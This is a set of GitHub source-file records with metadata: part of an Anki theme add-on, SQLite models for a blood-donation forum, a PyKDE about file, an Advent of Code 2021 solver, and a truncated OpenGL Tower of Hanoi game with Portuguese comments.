getattr(mw.reviewer, \"_redraw_current_card\", False):\n mw.reviewer._redraw_current_card()\n mw.fade_in_webview()\n elif mw.state == \"overview\":\n mw.overview.refresh()\n elif mw.state == \"deckBrowser\":\n mw.deckBrowser.show()\n\n # Redraw toolbar\n if attribute_exists(gui_hooks, \"top_toolbar_did_init_links\"):\n gui_hooks.top_toolbar_did_init_links.remove(redraw_toolbar)\n\n\ndef update_theme() -> None:\n themes_parsed = get_theme(theme)\n theme_colors = themes_parsed.get(\"colors\")\n light = 2\n dark = 3\n color_mode = dark if theme_manager.get_night_mode() else light\n # Apply theme on colors\n ncolors = {}\n # Legacy color check\n # logger.debug(dir(colors))\n legacy = check_legacy_colors()\n for color_name in theme_colors:\n c = theme_colors.get(color_name)\n ncolors[color_name] = c[color_mode]\n if legacy:\n colors[f\"day{c[3].replace('--','-')}\"] = c[light]\n colors[f\"night{c[3].replace('--','-')}\"] = c[dark]\n else:\n if getattr(colors, color_name, False):\n if anki_version >= (2, 1, 56):\n setattr(colors, color_name, {\"light\": c[light], \"dark\": c[dark]})\n else:\n setattr(colors, color_name, (c[light], c[dark]))\n # Apply theme on palette\n apply_theme(ncolors)\n gui_hooks.debug_console_will_show(mw)\n refresh_all_windows()\n\n\ndef apply_theme(colors) -> None:\n # Reset style and palette\n 
logger.debug(colors)\n if getattr(theme_manager, \"_default_style\", False):\n mw.app.setStyle(QStyleFactory.create(theme_manager._default_style))\n if getattr(theme_manager, \"default_palette\", False):\n mw.app.setPalette(theme_manager.default_palette)\n else:\n theme_manager._apply_palette(mw.app)\n # Load and apply palette\n palette = QPalette()\n # Update palette\n if anki_version >= (2, 1, 56):\n text = QColor(colors[\"FG\"])\n palette.setColor(QPalette.ColorRole.WindowText, text)\n palette.setColor(QPalette.ColorRole.ToolTipText, text)\n palette.setColor(QPalette.ColorRole.Text, text)\n palette.setColor(QPalette.ColorRole.ButtonText, text)\n\n hlbg = QColor(colors[\"HIGHLIGHT_BG\"])\n palette.setColor(QPalette.ColorRole.HighlightedText, QColor(colors[\"HIGHLIGHT_FG\"]))\n palette.setColor(QPalette.ColorRole.Highlight, hlbg)\n\n canvas = QColor(colors[\"CANVAS\"])\n palette.setColor(QPalette.ColorRole.Window, canvas)\n palette.setColor(QPalette.ColorRole.AlternateBase, canvas)\n\n palette.setColor(QPalette.ColorRole.Button, QColor(colors[\"BUTTON_BG\"]))\n\n input_base = QColor(colors[\"CANVAS_CODE\"])\n palette.setColor(QPalette.ColorRole.Base, input_base)\n palette.setColor(QPalette.ColorRole.ToolTipBase, input_base)\n\n palette.setColor(QPalette.ColorRole.PlaceholderText, QColor(colors[\"FG_SUBTLE\"]))\n\n disabled_color = QColor(colors[\"FG_DISABLED\"])\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.Text, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.ButtonText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.HighlightedText, disabled_color)\n palette.setColor(QPalette.ColorRole.Link, QColor(colors[\"FG_LINK\"]))\n palette.setColor(QPalette.ColorRole.BrightText, Qt.GlobalColor.red)\n\n # Update webview background\n AnkiWebView._getWindowColor = lambda *args: QColor(colors[\"CANVAS\"])\n AnkiWebView.get_window_bg_color = lambda *args: QColor(colors[\"CANVAS\"])\n\n theme_manager._apply_palette(mw.app) # Update palette theme_manager\n mw.app.setPalette(palette) # Overwrite palette\n theme_manager._apply_style(mw.app) # Update stylesheet theme_manager\n else:\n # QT mappings\n color_map = {\n QPalette.ColorRole.Window: \"WINDOW_BG\",\n QPalette.ColorRole.WindowText: \"TEXT_FG\",\n QPalette.ColorRole.Base: \"FRAME_BG\",\n QPalette.ColorRole.AlternateBase: \"WINDOW_BG\",\n QPalette.ColorRole.ToolTipBase: \"TOOLTIP_BG\",\n QPalette.ColorRole.ToolTipText: \"TEXT_FG\",\n QPalette.ColorRole.Text: \"TEXT_FG\",\n QPalette.ColorRole.Button: \"BUTTON_BG\",\n QPalette.ColorRole.ButtonText: \"TEXT_FG\",\n QPalette.ColorRole.BrightText: \"HIGHLIGHT_FG\",\n QPalette.ColorRole.HighlightedText: \"HIGHLIGHT_FG\",\n QPalette.ColorRole.Link: \"LINK\",\n QPalette.ColorRole.NoRole: \"WINDOW_BG\",\n }\n for color_role in color_map:\n palette.setColor(color_role, QColor(colors[color_map[color_role]]))\n\n highlight_bg = QColor(colors[\"HIGHLIGHT_BG\"])\n highlight_bg.setAlpha(64)\n palette.setColor(QPalette.ColorRole.Highlight, highlight_bg)\n\n disabled_color = QColor(colors[\"DISABLED\"])\n palette.setColor(QPalette.ColorRole.PlaceholderText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.Text, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.ButtonText, disabled_color)\n palette.setColor(QPalette.ColorGroup.Disabled, QPalette.ColorRole.HighlightedText, disabled_color)\n\n # Update webview background\n AnkiWebView._getWindowColor = lambda 
*args: QColor(colors[\"WINDOW_BG\"])\n AnkiWebView.get_window_bg_color = lambda *args: QColor(colors[\"WINDOW_BG\"])\n\n theme_manager._apply_palette(mw.app) # Update palette theme_manager\n mw.app.setPalette(palette) # Overwrite palette\n theme_manager._apply_style(mw.app) # Update stylesheet theme_manager\n\n\ndef create_menu_action(parent: QWidget, dialog_class: QDialog, dialog_name: str) -> QAction:\n def open_dialog():\n dialog = dialog_class(mw)\n return dialog.exec()\n\n action = QAction(dialog_name, parent)\n action.triggered.connect(open_dialog)\n return action\n\n\n# Load in the Anki-redesign menu\nif not hasattr(mw, 'anki_redesign'):\n mw.form.menuTools.addAction(create_menu_action(mw, AnkiRedesignConfigDialog, \"&Anki-redesign\"))\n # Update and apply theme\n mw.reset()\n update_theme()\n # Rereload view to fix the QT6 header size on startup\n if 'Qt6' in QPalette.ColorRole.__module__:\n logger.debug('QT6 detected...')\n mw.reset()\n update_theme()\n\n\ndef on_theme_did_change() -> None:\n global color_mode\n color_mode = 3 if theme_manager.get_night_mode() else 2 # 2 = light and 3 = dark\n logger.debug(\"Theme changed\")\n mw.reset()\n update_theme()\n\n\nif attribute_exists(gui_hooks, \"theme_did_change\"):\n gui_hooks.theme_did_change.append(on_theme_did_change)\n","repo_name":"Shirajuki/anki-redesign","sub_path":"utils/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":24798,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"78"} +{"seq_id":"27686808215","text":"import sqlite3\nimport os\ndef init_db():\n if not os.path.isfile('Database.sqlite'):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = '''\n PRAGMA foreign_keys = ON;\n\n CREATE TABLE donor (\n email TEXT PRIMARY KEY UNIQUE,\n name TEXT,\n age TEXT,\n gender TEXT,\n state TEXT,\n district TEXT,\n blood_group TEXT,\n contact Text,\n password TEXT\n );\n\n CREATE TABLE hospital (\n email TEXT PRIMARY KEY UNIQUE,\n name TEXT,\n license_no TEXT UNIQUE,\n district TEXT,\n state TEXT,\n contacts TEXT,\n password TEXT\n );\n\n CREATE TABLE availableBlood (\n id TEXT PRIMARY KEY,\n O_positive INTEGER DEFAULT 0,\n O_negative INTEGER DEFAULT 0,\n AB_positive INTEGER DEFAULT 0,\n AB_negative INTEGER DEFAULT 0,\n B_negative INTEGER DEFAULT 0,\n B_positive INTEGER DEFAULT 0,\n A_negative INTEGER DEFAULT 0,\n A_positive INTEGER DEFAULT 0,\n FOREIGN KEY (id) REFERENCES hospital (email)\n );\n\n CREATE TABLE camp (\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n hospital_id TEXT,\n name TEXT DEFAULT 'camp',\n location TEXT DEFAULT 'hospital',\n date DATE DEFAULT (date('now', '+7 days')),\n no_of_donrs INTEGER DEFAULT 0,\n FOREIGN KEY (hospital_id) REFERENCES hospital(email)\n );\n\n CREATE TABLE campRegistered (\n donor_id TEXT,\n hospital_id TEXT,\n camp_id INTEGER,\n status TEXT,\n FOREIGN KEY (donor_id) REFERENCES donor(email),\n FOREIGN KEY (hospital_id) REFERENCES hospital(email),\n FOREIGN KEY (camp_id) REFERENCES camp(id)\n );\n\n CREATE TABLE admin (\n email TEXT PRIMARY KEY,\n password TEXT,\n name TEXT\n );\n\n '''\n\n cursor.executescript(query)\n cursor.close()\n connection.close()\n\n\ndef insert_donor(email, name, age, gender, state, district, blood_group, contact, password):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO donor (email, name, age, gender, state, district, blood_group, contact, password)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n 
cursor.execute(query, (email, name, age, gender, state, district, blood_group, contact, password))\n \n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_hospital(email, name, license_no, district, state, contacts, password):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO hospital (email, name, license_no, district, state, contacts, password)\n VALUES (?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (email, name, license_no, district, state, contacts, password))\n \n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_camp(hospital_id, name, location, date, no_of_donors):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO camp (hospital_id, name, location, date, no_of_donors)\n VALUES (?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (hospital_id, name, location, date, no_of_donors))\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_available_blood(id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO availableBlood (id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive)\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (id, O_positive, O_negative, AB_positive, AB_negative, B_negative, B_positive, A_negative, A_positive))\n\n connection.commit()\n cursor.close()\n connection.close()\n\n\ndef insert_camp_registered(donor_id, hospital_id, camp_id, status):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO campRegistered (donor_id, hospital_id, camp_id, status)\n VALUES (?, ?, ?, ?)\n \"\"\"\n cursor.execute(query, (donor_id, hospital_id, camp_id, status))\n\n connection.commit()\n cursor.close()\n connection.close()\n\ndef insert_admin(email, password, name):\n connection = sqlite3.connect('Database.sqlite')\n cursor = connection.cursor()\n\n query = \"\"\"\n INSERT INTO admin (email, password, name)\n VALUES (?, ?, ?)\n \"\"\"\n cursor.execute(query, (email, password, name))\n\n connection.commit()\n cursor.close()\n connection.close()\n\n# fetch donor from email id.\ndef get_donor_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM donor WHERE email = ?\", (email,))\n donor = cursor.fetchone()\n connection.close()\n return donor\n\ndef get_hospital_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM hospital WHERE email = ?\", (email,))\n hospital = cursor.fetchone()\n connection.close()\n return hospital\n\ndef get_admin_by_email(email):\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM admin WHERE email = ?\", (email,))\n admin = cursor.fetchone()\n connection.close()\n return admin\n\ndef get_all_hospitals():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM hospital\")\n hospitals = cursor.fetchall()\n connection.close()\n return hospitals\n\ndef get_hospitals_count():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT count(*) FROM hospital\")\n count = 
cursor.fetchall()\n connection.close()\n return count\n\ndef get_all_donors():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM donor\")\n donors = cursor.fetchall()\n connection.close()\n return donors\n\ndef get_donors_count():\n connection = sqlite3.connect('database.sqlite')\n cursor = connection.cursor()\n cursor.execute(\"SELECT count(*) FROM donor\")\n count = cursor.fetchall()\n connection.close()\n return count\n\n# Function to delete a hospital by email\ndef delete_hospital_by_email(email):\n try:\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM hospital WHERE email = ?\", (email,))\n conn.commit()\n conn.close()\n return True # Return True on successful deletion\n except sqlite3.Error as e:\n print(\"Error deleting hospital:\", e)\n return False # Return False on error\n\n# Function to delete a donor by email\ndef delete_donor_by_email(email):\n try:\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"DELETE FROM donor WHERE email = ?\", (email,))\n conn.commit()\n conn.close()\n return True # Return True on successful deletion\n except sqlite3.Error as e:\n print(\"Error deleting donor:\", e)\n return False # Return False on error\n\nfrom flask import flash\n\ndef update_hospital_profile(email, name, contact):\n try:\n # Connect to the SQLite database\n conn = sqlite3.connect('database.sqlite')\n cursor = conn.cursor()\n\n # Update the hospital's profile in the database\n cursor.execute(\"UPDATE hospital SET name = ?, contact = ? WHERE email = ?\", (name, contact, email))\n conn.commit()\n\n flash('Your profile has been updated successfully', 'success')\n\n except Exception as e:\n # Handle exceptions, log errors, or display error messages as needed\n flash('An error occurred while updating your profile. Please try again later.', 'danger')\n finally:\n # Close the database connection, regardless of success or failure\n if conn:\n conn.close()\n\n\n# Sankhanil\n\ndef search_camps_backend(state, district, donor_id = None):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n query = ''\n res = None\n if donor_id != None:\n query = '''\n SELECT c.id, h.name, c.name, c.date, c.no_of_donrs, h.contacts FROM camp c\n JOIN hospital h ON c.hospital_id = h.email\n WHERE hospital_id IN (\n SELECT email FROM hospital\n WHERE state = ? AND district = ?) AND\n c.id NOT IN (\n SELECT camp_id from campRegistered WHERE donor_id = ?\n );\n '''\n res = cursor.execute(query, (state, district, donor_id))\n else:\n query = '''\n SELECT c.id, h.name, c.name, c.date, c.no_of_donrs, h.contacts FROM camp c\n JOIN hospital h ON c.hospital_id = h.email\n WHERE hospital_id IN (\n SELECT email FROM hospital\n WHERE state = ? 
AND district = ?);\n '''\n res = cursor.execute(query, (state, district))\n\n data = res.fetchall()\n\n conn.close()\n\n return data\n\n\ndef register_into_camp(donor_id, hospital_id, camp_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n res = cursor.execute('INSERT INTO campRegistered VALUES(?, ?, ?, ?)', (donor_id, hospital_id, camp_id, 'Awaited'))\n\n conn.commit()\n conn.close()\n\n\ndef get_donor_past_camps(donor_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n query = '''\n SELECT c.name, c.date, h.name, h.state, h.district, r.status FROM campRegistered r\n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) < DATE('now');\n '''\n res = cursor.execute(query, (donor_id, ))\n rows = res.fetchall()\n\n conn.close()\n\n return rows\n\n\ndef view_registered_upcoming_camps(donor_id):\n conn = sqlite3.connect('Database.sqlite')\n cursor = conn.cursor()\n\n res1 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Awaited';\n ''', (donor_id, ))\n awaited_rows = res1.fetchall()\n\n res2 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Accepted';\n ''', (donor_id, ))\n accepted_rows = res2.fetchall()\n\n res3 = cursor.execute('''\n SELECT c.name, c.date, h.name, h.contacts, h.state, h.district FROM campRegistered r \n JOIN camp c ON r.camp_id = c.id\n JOIN hospital h ON h.email = c.hospital_id\n WHERE r.donor_id = ?\n AND DATE(c.date) >= DATE('now')\n AND status = 'Rejected';\n ''', (donor_id, ))\n rejected_rows = res3.fetchall()\n\n conn.close()\n\n return awaited_rows, accepted_rows, rejected_rows","repo_name":"Prakashgolusingh/Online-Blood-Forum","sub_path":"changes/changes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21394158398","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n\nfrom PyKDE4.kdecore import KAboutData, ki18n\n\nappName = \"pide\"\nmodName = \"pide\"\nprogramName = ki18n(\"Pide\")\nversion = \"0.0.1\"\ndescription = ki18n(\"PIDE\")\nlicense = KAboutData.License_GPL\ncopyright = ki18n(\"(c) 2009 TUBITAK/UEKAE\")\ntext = ki18n(\" \")\nhomePage = \"http://www.pardus.org.tr/eng/projects\"\nbugEmail = \"osman.mollahamid@gmail.com\"\ncatalog = appName\naboutData = KAboutData(appName, catalog, programName, version, description, license, copyright, text, homePage, bugEmail)\n\n# Author(s)\naboutData.addAuthor(ki18n(\"Osman Mollahamut\"), ki18n(\"Current Maintainer\"))\n\n\n\n","repo_name":"pisilinux/uludag","sub_path":"trunk/playground/intern/2009/pide/code/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28492855894","text":"#!/usr/bin/env python3\n\"\"\"This script solves puzzles of https://adventofcode.com/\"\"\"\n\nimport os\nimport sys\nfrom aoc_utilities import Input, test_input\n\n# 2 digit day fetched from filename\nDAY = os.path.basename(__file__)[3:5]\n\n\ndef 
bitsToInt(listOfBits):\n return int(\"\".join(str(x) for x in listOfBits), 2)\n\ndef solve1(data):\n \"\"\"Solves part 1.\"\"\"\n lines = [list(line) for line in data.splitlines()]\n columns = [*zip(*lines)]\n\n gammaBits = []\n epsilonBits = []\n minimumToBeMostCommon = int(len(lines) / 2)\n\n for col in columns:\n if col.count(\"1\") > minimumToBeMostCommon:\n gammaBits.append(\"1\")\n epsilonBits.append(\"0\")\n else:\n gammaBits.append(\"0\")\n epsilonBits.append(\"1\")\n\n return bitsToInt(gammaBits) * bitsToInt(epsilonBits)\n\n\ndef solve2(data):\n \"\"\"Solves part2.\"\"\"\n lines = [list(line) for line in data.splitlines()]\n\n candidatesForO2gen = lines\n candidatesForCO2scrub = lines\n\n for index in range(len(lines[0])):\n columns = [*zip(*candidatesForO2gen)]\n howMany1s = columns[index].count(\"1\")\n howMany0s = len(columns[0]) - howMany1s\n\n if howMany1s > howMany0s:\n print(f\"most common bit for column n°{index} is 1\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index]==\"1\"]\n elif howMany1s == howMany0s:\n print(f\"for column n°{index}, there are as many 1s as 0s, keeping 1s\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index] == \"1\"]\n else:\n print(f\"most common bit for column n°{index} is 0\")\n candidatesForO2gen = [x for x in candidatesForO2gen if x[index]==\"0\"]\n if len(candidatesForO2gen) == 1:\n print(f\"most common bit for column n°{index} is 0\")\n break\n\n for index in range(len(lines[0])):\n columns = [*zip(*candidatesForCO2scrub)]\n howMany1s = columns[index].count(\"1\")\n howMany0s = len(columns[0]) - howMany1s\n\n if howMany0s > howMany1s:\n print(f\"least common bit for column n°{index} is 1\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index]==\"1\"]\n elif howMany1s == howMany0s:\n print(f\"for column n°{index}, there are as many 1s as 0s, keeping 0s\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index] == \"0\"]\n else:\n print(f\"least common bit for column n°{index} is 0\")\n candidatesForCO2scrub = [x for x in candidatesForCO2scrub if x[index]==\"0\"]\n if len(candidatesForCO2scrub) == 1:\n break\n\n\n return bitsToInt(candidatesForO2gen[0]) * bitsToInt(candidatesForCO2scrub[0])\n\n\"\"\"\nUse script args to execute the right function.\n\"\"\"\nif __name__ == '__main__':\n if len(sys.argv) > 1 and sys.argv[1] == '1':\n res = solve1((Input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '1t':\n res = solve1((test_input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '2':\n res = solve2((Input(DAY).read()))\n print(res)\n if len(sys.argv) > 1 and sys.argv[1] == '2t':\n res = solve2((test_input(DAY).read()))\n print(res)\n","repo_name":"edelans/Advent-of-Code","sub_path":"aoc2021/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29051972519","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\nimport OpenGL.GLUT as glut\n\n#variaveis globais necessarias para o funcionamento do programa\nwin = False\nwin_message_str = 'Você venceu!'\nwin_message_rotation = 0.0\nwindow_width = 640\nwindow_height = 480\ntowers_number = 3\ntowers_width = 25\ntowers_height = 75\ntowers = {}\ndiscs = {}\n\n\n#seta valores default para as variaveis globais envolvendo torres\ndef set_towers_default_values():\n global towers, towers_number, towers_width, towers_height\n towers_number = 3\n 
towers_width = 25\n towers_height = 75\n towers = {\n 't1': {\n 'pos': -70,\n 'discs': [1, 2, 3] \n },\n 't2': {\n 'pos': 0,\n 'discs': [] \n },\n 't3': {\n 'pos': 70,\n 'discs': [] \n },\n }\n\n\n#seta valores default para as variaveis globais envolvendo os discos\ndef set_discs_default_values():\n global discs\n discs = {\n 'disc1': {\n 'number': 1,\n 'x': 4,\n 'y': 8,\n 'min_limit_x': -74,\n 'max_limit_x': -66,\n 'min_limit_y': 20,\n 'max_limit_y': 30,\n 'pos_x': -70,\n 'pos_y': 16,\n 'tower': 1\n },\n 'disc2': {\n 'number': 2,\n 'x': 7,\n 'y': 8,\n 'min_limit_x': -77,\n 'max_limit_x': -63,\n 'min_limit_y': 10,\n 'max_limit_y': 20,\n 'pos_x': -70,\n 'pos_y': 8,\n 'tower': 1\n },\n 'disc3': {\n 'number': 3,\n 'x': 10,\n 'y': 8,\n 'min_limit_x': -80,\n 'max_limit_x': -60,\n 'min_limit_y': 0,\n 'max_limit_y': 10,\n 'pos_x': -70,\n 'pos_y': 0,\n 'tower': 1\n },\n }\n\n\n#cria uma torre\ndef tower():\n glBegin(GL_LINES)\n glVertex2f(-towers_width, 0)\n glVertex2f(towers_width, 0)\n glEnd()\n glBegin(GL_LINES)\n glVertex2f(0, towers_height)\n glVertex2f(0, 0)\n glEnd()\n\n\n#faz a função de escala da torre\ndef tower_scale():\n if towers_number == 5:\n glScalef(0.5, 0.5, 1.0)\n\n\n#desenha todas as torres\ndef draw_all_towers():\n glColor3f(0.0, 0.0, 0.0)\n glLineWidth(6)\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t1']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t2']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t3']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n if towers_number == 5:\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t4']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n glPushMatrix()\n tower_scale()\n glTranslatef(towers['t5']['pos'], 0, 0)\n tower()\n glPopMatrix()\n\n\n#desenha um disco\ndef draw_disc(disc_number):\n glBegin(GL_POLYGON)\n glVertex2f(discs['disc'+str(disc_number)]['x']*-1, discs['disc'+str(disc_number)]['y'])\n glVertex2f(discs['disc'+str(disc_number)]['x'], discs['disc'+str(disc_number)]['y'])\n glVertex2f(discs['disc'+str(disc_number)]['x'], 0)\n glVertex2f(discs['disc'+str(disc_number)]['x']*-1, 0)\n glEnd()\n\n\n#posiciona o disco\ndef disc_positioning(x, y):\n glTranslatef(x, 0, 0)\n glTranslatef(0, y, 0)\n\n\n#desenha todos os discos\ndef draw_all_discs():\n glColor3f(1.0, 0.0, 0.0)\n glPushMatrix()\n disc_positioning(discs['disc1']['pos_x'], discs['disc1']['pos_y'])\n draw_disc(1)\n glPopMatrix()\n\n\n glColor3f(0.0, 1.0, 0.0)\n glPushMatrix()\n disc_positioning(discs['disc2']['pos_x'], discs['disc2']['pos_y'])\n draw_disc(2)\n glPopMatrix()\n\n glColor3f(0.0, 0.0, 1.0)\n glPushMatrix()\n disc_positioning(discs['disc3']['pos_x'], discs['disc3']['pos_y'])\n draw_disc(3)\n glPopMatrix()\n\n if towers_number == 5:\n glColor3f(0.5, 0.5, 1.0)\n glPushMatrix()\n disc_positioning(discs['disc4']['pos_x'], discs['disc4']['pos_y'])\n draw_disc(4)\n glPopMatrix()\n\n glColor3f(0.5, 0.5, 0.5)\n glPushMatrix()\n disc_positioning(discs['disc5']['pos_x'], discs['disc5']['pos_y'])\n draw_disc(5)\n glPopMatrix()\n\n\n#desenha o texto de ajuda\ndef help_text():\n text = \"Aperte 't' para aumentar o número de torres e 'r' para reiniciar o jogo\"\n glColor3f(0, 0, 0)\n glRasterPos2f(-85, -90)\n for i in range(len(text)):\n glut.glutBitmapCharacter(GLUT_BITMAP_HELVETICA_18, ord(text[i]))\n\n\n#desenha o texto de vitória\ndef win_message():\n global win_message_rotation\n glColor3f(0, 0.8, 0)\n glPushMatrix()\n glRotatef (win_message_rotation, 0.0, 0.0, 
1.0)\n glRasterPos2f(-20, -20)\n for i in range(len(win_message_str)):\n glut.glutBitmapCharacter(GLUT_BITMAP_TIMES_ROMAN_24, ord(win_message_str[i]))\n glPopMatrix()\n\n\n#desenha a base do jogo\ndef draw():\n glClear(GL_COLOR_BUFFER_BIT)\n\n draw_all_towers()\n draw_all_discs()\n\n if win:\n win_message()\n\n help_text()\n\n glutSwapBuffers()\n\n\n#realiza a conversão do SRD para o SRU\ndef srd_to_sru(x, y):\n x = (2 * x) / (window_width / 100) - 100\n y = (2 * -y) / (window_height / 100) + 100\n return x, y\n\n\n#valida se o clique esta na area do disco\ndef is_in_disc_area(disc, x, y):\n return x >= disc['min_limit_x'] and x <= disc['max_limit_x'] and y >= disc['min_limit_y'] and y <= disc['max_limit_y']\n\n\n#pega uma torre\ndef get_tower(tower_number):\n return towers[f't{tower_number}']\n\n\n#valida se o movimento é valido\ndef can_make_the_move(actual_tower, next_tower, disc):\n if actual_tower['discs'][0] != disc['number']:\n return False\n if len(next_tower['discs']) != 0 and next_tower['discs'][0] < disc['number']:\n return False\n return True\n\n\n#seta os valores pra nova posicao do disco após o clique\ndef set_disc_position(disc, tower):\n if towers_number == 5:\n disc_pos_x = tower['pos'] / 2\n else:\n disc_pos_x = tower['pos']\n disc_pos_y = len(tower['discs']) * 8\n disc['pos_x'] = disc_pos_x\n disc['pos_y'] = disc_pos_y\n disc['min_limit_x'] = disc_pos_x - disc['x']\n disc['max_limit_x'] = disc_pos_x + disc['x']\n disc['min_limit_y'] = disc_pos_y\n disc['max_limit_y'] = disc_pos_y + 8\n\n\n#seta os valores necessarios do disco após o clique\ndef set_tower_discs(disc, origin_tower, destiny_tower, next_tower_number):\n disc['tower'] = next_tower_number\n origin_tower['discs'].pop(0)\n destiny_tower['discs'].insert(0, disc['number'])\n \n\n#função do mouse\ndef on_mouse_click(button, state, x, y):\n global win, win_message_rotation\n\n if state == 1:\n return\n\n if win:\n win_message_rotation += 20.0\n glutPostRedisplay()\n return\n\n x, y = srd_to_sru(x, y)\n\n for disc in discs.values():\n if is_in_disc_area(disc, x, y):\n actual_tower = get_tower(disc['tower'])\n \n next_tower_number = disc['tower'] + 1\n if next_tower_number > towers_number:\n next_tower_number = 1\n next_tower = get_tower(next_tower_number)\n\n if not can_make_the_move(actual_tower, next_tower, disc):\n return\n \n set_disc_position(disc, next_tower)\n set_tower_discs(disc, actual_tower, next_tower, next_tower_number)\n\n if towers_number == 3:\n if len(towers['t3']['discs']) == 3:\n win = True\n else:\n if len(towers['t3']['discs']) == 5:\n win = True\n\n glutPostRedisplay()\n\n\n#atualiza as variaveis globais para jogar com 5 torres\ndef set_five_towers_global_values():\n global towers_number, towers_width, towers_height, win\n win = False\n towers_number = 5\n towers_width = 30\n towers_height = 90\n\n\n#ajusta as posições das torres para 5 torres\ndef adjust_towers_position(disc, tower_pos, x, min_limit_y, max_limit_y):\n discs_position = tower_pos / 2\n\n disc['x'] = x\n disc['min_limit_x'] = discs_position - x\n disc['max_limit_x'] = discs_position + x\n disc['min_limit_y'] = min_limit_y\n disc['max_limit_y'] = max_limit_y\n disc['pos_x'] = discs_position\n disc['pos_y'] = min_limit_y\n\n\n#adiciona os novos discos quando é alterado pra 5 torres\ndef add_new_discs(tower_pos):\n discs_position = tower_pos / 2\n\n discs['disc4'] = {\n 'number': 4,\n 'x': 10,\n 'y': 8,\n 'min_limit_x': -83,\n 'max_limit_x': -57,\n 'min_limit_y': 8,\n 'max_limit_y': 16,\n 'pos_x': discs_position,\n 'pos_y': 8,\n 
